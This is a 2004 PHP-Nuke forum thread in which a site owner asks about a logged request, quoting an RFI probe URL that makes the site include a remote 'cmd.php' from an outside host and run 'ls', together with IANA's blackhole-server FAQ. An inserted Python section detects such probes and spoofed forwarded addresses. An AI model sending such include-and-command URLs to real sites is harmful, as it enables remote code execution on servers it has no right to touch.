Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
djw2
Regular
Joined: Sep 19, 2003
Posts: 95
Location: St. Louis, MO

Posted: Thu Jul 08, 2004 3:16 pm

Hey everybody,

I got one of those redirect scripts today, it tried to send me to a location I'm not familiar with.

This was the redirect...
[ Only registered users can see links on this board! Get registered or login! ]

I don't know what's there, for I didn't go there... I didn't like the cmd part of the URL, so I opted not to go.

Anyway, it came from a network I hadn't seen yet as well.

IP 172.16.2.100

Quote:
Forwarded For: 172.16.2.100
Client IP: none
Remote Address: 80.78.110.194
Remote Port: 4573
Request Method: GET
--------------------
Who-Is for IP
172.16.2.100




OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 172.16.0.0 - 172.31.255.255
CIDR: 172.16.0.0/12
NetName: IANA-BBLK-RESERVED
NetHandle: NET-172-16-0-0-1
Parent: NET-172-0-0-0-0
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Comment: Please see RFC 1918 for additional information.
Comment:
RegDate: 1994-03-15
Updated: 2002-09-12

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [ Only registered users can see links on this board! Get registered or login! ]

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [ Only registered users can see links on this board! Get registered or login! ]



Take it easy everybody.

Dan

_________________
It has become appallingly obvious that our technology has exceeded our humanity.

--Albert Einstein

djw2

Posted: Thu Jul 08, 2004 3:22 pm

Ok, I have an update... but I don't know what it means.

First of all, here's the query string...

Quote:
/index.php?page=http://shirosako.pochta.ru/cmd.php&cmd=ls


Now, to me... that looks just like the redirects I've been getting from the hackers.

I sent a report and received an auto-responder saying...

Quote:
Please see the FAQ at the URL below for further
information about your abuse/IP address inquiry.

<http://www.iana.org/faqs/abuse-faq.htm>

If after reading the FAQ you still believe that
your message was correctly directed to the IANA
please follow the instructions in the FAQ for resending.



So I went to the FAQ and found this...

Quote:
FAQ on "Blackhole Servers"

The following 8 questions/answers contain information regarding the "blackhole" servers:

Q1: What are the blackhole servers?

A1: The "blackhole" Servers, "blackhole-1.iana.org" and "blackhole-2.iana.org", are an obscure part of the Internet infrastructure. People are sometimes puzzled or alarmed to find unexplained references to them in log files or other places. This FAQ tries to explain what these servers do, and why you may be seeing them. Specifically, these servers are part of the Domain Name System (DNS), and respond to inverse queries to addresses in the reserved RFC 1918 address ranges:

10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255

See: RFC 1918

These addresses are reserved for use on private intranets, and should never appear on the public internet. The 192.168.0.0 addresses are especially common, being frequently used in small office or home networking products like routers, gateways, or firewalls.

Q2: What is "prisoner"?

A2. "prisoner" is a blackhole server.

Q3: What are "inverse queries"?

A3: With normal ("forward") queries the domain-name system responds with an address (e.g., "192.0.34.162") when given a name (e.g., "www.iana.org"). Inverse ("reverse") queries do the reverse: the domain name system returns the name ("www.iana.org") when given the address ("192.0.34.162"). While inverse queries are rare from a human perspective, some network services automatically do an inverse lookup whenever they process a request from a particular IP address, and consequently they form a significant part of DNS network traffic.

Q4: Why do we need the blackhole servers?

A4: Strictly speaking, we don't need the blackhole servers. However, DNS clients will sometimes remember the results from previous queries (that is, "good" answers to queries are cached), and the blackhole servers are configured to return answers that DNS clients can cache. This allows the clients to rely on their cached answers, instead of sending another query, which in turn reduces the overall amount of traffic on the Internet. Since the RFC 1918 addresses should never be used on the public Internet, there should be no names in the public DNS that refer to them. Hence, an inverse lookup on one of these addresses should never work. The IANA blackhole servers respond to these inverse queries, and always return an answer that says, authoritatively, that "this address does not exist". Because of the caching noted above, this is far better than simply not responding at all, so the blackhole servers are provided as a public service.

Q5: How busy are the blackhole servers?

A5: While rates vary, the blackhole servers generally answer thousands of queries per second. In the past couple of years the number of queries to the blackhole servers has increased dramatically. It is believed that the large majority of those queries occur because of "leakage" from intranets that are using the RFC 1918 private addresses. This can happen if the private intranet is internally using services that automatically do reverse queries, and the local DNS resolver needs to go outside the intranet to resolve these names. For well-configured intranets, this shouldn't happen. Users of private address space should have their local DNS configured to provide responses to inverse lookups in the private address space.

Q6: But according to my logs the blackhole servers are attacking my network/host. Could it be that a hacker has taken over the blackhole servers, and is attacking other systems?

A6: It is extremely common for logs in consumer firewall products to mistakenly report such attacks, and it is extremely unlikely that the blackhole servers have been taken over by hackers. There are several other far more likely explanations for such log entries. If, for example, your system is configured to pass all outgoing packets, but to block most incoming packets (an extremely common case), then it may be that your DNS client is successfully sending queries to the blackhole servers, but blocking (and logging) the returning answers.

Furthermore, while it is extremely unlikely that hackers have taken over the blackhole servers, it is very common for hackers to disguise their activities by putting RFC 1918 addresses in "spoofed" packets (see the above discussion about spoofed packets).

In fact, because it is so easy to spoof packets one must always take the source (or "return") address with a grain of salt. If the source address is an RFC 1918 address, it is almost certainly the case that either 1) the address is spoofed; or 2) it is coming from your own equipment.

Q7: Is there anything I can do about the messages in my logs?

A7: The best way to solve this problem is to set up DNS on your local network. Unfortunately, this can be complicated, and may not in practice be possible. If you are using operating systems from Microsoft, you might want to look at <http://support.microsoft.com/default.aspx?scid=kb;EN-US;q259922>. (Please note that the blackhole servers used to be located at isi.edu).

Q8: Is there anything more than just logs at issue?

A8: Possibly. But you should make every effort to fix the problem from your end, because episodes of overload to the blackhole servers are becoming more common, and that can have more serious consequences. See, for example, <http://www.shmoo.com/mail/fw1/apr99/msg00946.html>.



That's what this was...

Quote:
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG


So what is the FAQ telling me, what's it mean? Was this not a hacker?

If not who was it?

Thanks a lot.

Dan
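An added triage example (my code, not NukeSentinel's and not from either poster) that works through the two facts the thread turns on. First, "Forwarded For" and "Client IP" are request headers the sender chooses, so the 172.16.2.100 that whois sent to IANA tells you nothing about who sent the request; the TCP peer in "Remote Address" (80.78.110.194 here) is the only address the sender cannot fake, and a non-routable value in a forwarded header is exactly the "spoofed or from your own equipment" case the IANA FAQ describes. Second, the query string `/index.php?page=http://shirosako.pochta.ru/cmd.php&cmd=ls` is the textbook probe for a PHP remote file inclusion hole: if `index.php` does `include($_GET['page'])`, PHP fetches `cmd.php` from the attacker's host and runs it, and `cmd=ls` is the shell command that script executes. The sample log is constructed from the post; the "Request URI" line is my addition so both posts can be triaged from one record, and the empty trusted-proxy set and the `ALLOWED_PAGES` allowlist are assumptions.

```python
"""Triage of the request from the thread: a spoofed Forwarded-For address plus a
PHP remote file inclusion (RFI) probe. Added example, not NukeSentinel code."""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample. The first five lines mirror the NukeSentinel block quoted
# in the first post; the "Request URI" line is an assumption added so that the
# query string from the second post can be triaged from the same record.
SAMPLE_LOG = """\
Forwarded For: 172.16.2.100
Client IP: none
Remote Address: 80.78.110.194
Remote Port: 4573
Request Method: GET
Request URI: /index.php?page=http://shirosako.pochta.ru/cmd.php&cmd=ls
"""

# Reverse proxies whose Forwarded-For header we would believe. Assumed empty:
# nothing in the thread suggests a proxy in front of the web server.
TRUSTED_PROXIES = frozenset()

# A "page" value beginning with a URL scheme or PHP stream wrapper (http:, ftp:,
# php:, data:) turns include($page) into execution of code fetched from elsewhere.
_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)

# Hypothetical allowlist standing in for a hardened replacement of
# include($_GET['page']): the parameter selects a key, never a path.
ALLOWED_PAGES = {"news": "modules/news.php", "forums": "modules/forums.php"}


def parse_log(text: str) -> Dict[str, str]:
    """Turn 'Key: value' lines into a dict; a value of 'none' becomes ''."""
    entry: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")  # split on the first colon only
        if not sep:
            continue
        value = value.strip()
        entry[key.strip()] = "" if value.lower() == "none" else value
    return entry


def classify_ip(text: str) -> str:
    """'private' (RFC 1918, loopback, link-local), 'global', 'reserved' or 'invalid'."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return "invalid"
    if addr.is_private:
        return "private"
    return "global" if addr.is_global else "reserved"


def true_client_ip(entry: Dict[str, str]) -> Tuple[str, str]:
    """Pick the address to attribute the request to, with the reason.

    Remote Address is the TCP peer and cannot be faked without losing the
    connection. Forwarded-For / Client IP are request headers the client chose;
    they only mean something when set by a proxy we run, and a non-routable
    value in them is spoofed or leaked from someone's intranet (IANA FAQ, A6).
    """
    peer = entry.get("Remote Address", "")
    forwarded = entry.get("Forwarded For", "") or entry.get("Client IP", "")
    if not forwarded:
        return peer, "no forwarded address; using the socket peer"
    if peer not in TRUSTED_PROXIES:
        return peer, "Forwarded-For %r did not come through a trusted proxy; ignored" % forwarded
    kind = classify_ip(forwarded)
    if kind != "global":
        return peer, "Forwarded-For %r is %s; spoofed or leaked, using the socket peer" % (forwarded, kind)
    return forwarded, "Forwarded-For accepted from a trusted proxy"


def rfi_indicators(uri: str) -> List[str]:
    """List the RFI signs in a request URI; an empty list means none were seen."""
    found: List[str] = []
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            if _SCHEME.match(value):
                found.append("%s= points at a URL or stream wrapper: %s" % (name, value))
    if "cmd" in query:
        found.append("cmd= carries a shell command for the included script: %s" % query["cmd"][0])
    return found


def safe_page(param: str, allowed: Dict[str, str] = ALLOWED_PAGES) -> Optional[str]:
    """Hardened lookup: return the file for an allowlisted key, else None."""
    return allowed.get(param)


def triage(log_text: str) -> Dict[str, object]:
    """Combine source attribution and RFI detection for one logged request."""
    entry = parse_log(log_text)
    attribute_to, reason = true_client_ip(entry)
    indicators = rfi_indicators(entry.get("Request URI", ""))
    return {
        "attribute_to": attribute_to,
        "reason": reason,
        "forwarded_for_kind": classify_ip(entry.get("Forwarded For", "")),
        "rfi_indicators": indicators,
        "verdict": "RFI probe" if indicators else "no RFI signs",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print("%s: %s" % (key, value))
```

Run against the sample, `triage` attributes the request to 80.78.110.194, labels the forwarded 172.16.2.100 as private, and reports two RFI indicators, which is the practical answer to the question above: the abuse report belongs with the owner of the Remote Address, not with IANA, and the `page=http://...` value, not the private address, is what made this a hacker. `safe_page` shows the shape of the fix on the application side: `http://shirosako.pochta.ru/cmd.php` resolves to nothing, while an allowlisted key maps to a fixed local file.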
 
digibeet
Regular
Joined: Jul 08, 2004
Posts: 96
Location: Amsterdam, the Netherlands

Posted: Thu Jul 08, 2004 4:09 pm

10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255

These addresses are reserved for use on private intranets, and should never appear on the public internet. The 192.168.0.0 addresses are especially common, being frequently used in small office or home networking products like routers, gateways, or firewalls.

A VERY short time ago (1 week) there was a Russian server that flooded the net with redirections and virus infections: after visiting the site, a backdoor was opened on the client PC. The server has been blocked and is no longer online; all actions from that group are closely watched so it won't be repeated, if possible.
 